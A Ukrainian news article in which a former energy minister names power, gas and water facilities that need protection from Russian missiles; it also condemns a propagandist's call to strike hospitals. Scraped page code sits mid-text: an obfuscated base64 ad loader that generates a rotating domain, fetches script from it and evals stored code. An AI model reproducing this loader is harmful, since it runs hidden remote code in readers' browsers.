Експерт назвав об’єкти критичної інфраструктури, які потрібно максимально захищати від російських ракет

Україні потрібно захистити від російських ракет високовольтні електричні мережі, газоперекачувальні станції та інші великі об’єкти критичної інфраструктури. Саме від них залежить забезпечення українських міст і сіл електроенергією, теплом, газом і водою.

Про це OBOZREVATEL заявив колишній міністр палива та енергетики Іван Плачков. Експерт переконаний, що російська армія і надалі буде намагатися їх руйнувати, і українцям потрібно бути до цього готовими.

«Такі інфраструктурні об’єкти найбільш важливі – це електростанції, газоперекачувальні станції, газорозподільні, насосні, які прокачують воду. Агресор буде намагатися їх руйнувати. Як нам готуватися? По-перше, дизель-генератори. Чим більше дизельних генераторів, тим краще. Особливо в лікарнях, дитячих закладах і будинках. Я думаю, що нам уже постачають достатньо багато, але вони зайвими не будуть», – сказав Іван Плачков.

Наприклад, у випадку пошкодження опорної високовольтної підстанції Україні потрібен буде певний час для її відновлення, це може бути навіть тиждень, підкреслив експерт. І протягом цього періоду потрібно буде забезпечувати споживачів електроенергією тощо.

Плачков наголосив, що енергосистема України загалом дуже гнучка, і генеруючих потужностей, які на сьогодні є, буде достатньо. Втім об’єкти критичної інфраструктури конче потребують захисту.

«Нам потрібно забезпечити захист високовольтних електричних мереж і підстанцій, захист таких основних об’єктів, що я назвав. Я думаю, що наша ППО працює і буде працювати над цим питанням», – сказав Плачков.

Російський найманець Владлен Татарський (справжнє ім’я Максим Фомін), який називає себе «військовим кореспондентом», закликав завдавати ударів по цивільній інфраструктурі України та знищувати електростанції, щоб у лікарнях помирало більше українців. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Про це він заявив в одному з пропагандистських відео, фрагмент якого опублікував український журналіст Денис Казанський.

Зокрема, рашист виправдовує російські удари по критичній інфраструктурі України на тлі поразки «другої армії світу» на полі бою, а також закликає повторно робити це.

«Навіть в обороні потрібно руйнувати інфраструктуру. Не працюватимуть шпиталі, більше х*хлів будуть помирати на операційних столах, наприклад», — заявив він.

«Як я вже не раз писав, ми не воюємо з людьми, тому що люди мають якісь поняття про людяність і честь. А воїнство Путіна – це покидьки роду людського, які самі виписали себе з людей, оскільки втратили якості, властиві людям», — прокоментував журналіст.

Підписуйтесь на Акцент в

(adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/ekspert-nazvav-ob-yekti-kritichnoyi-infrastrukturi-yaki-potribno-maksimalno-zahishhati-vid-rosijskih-raket/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top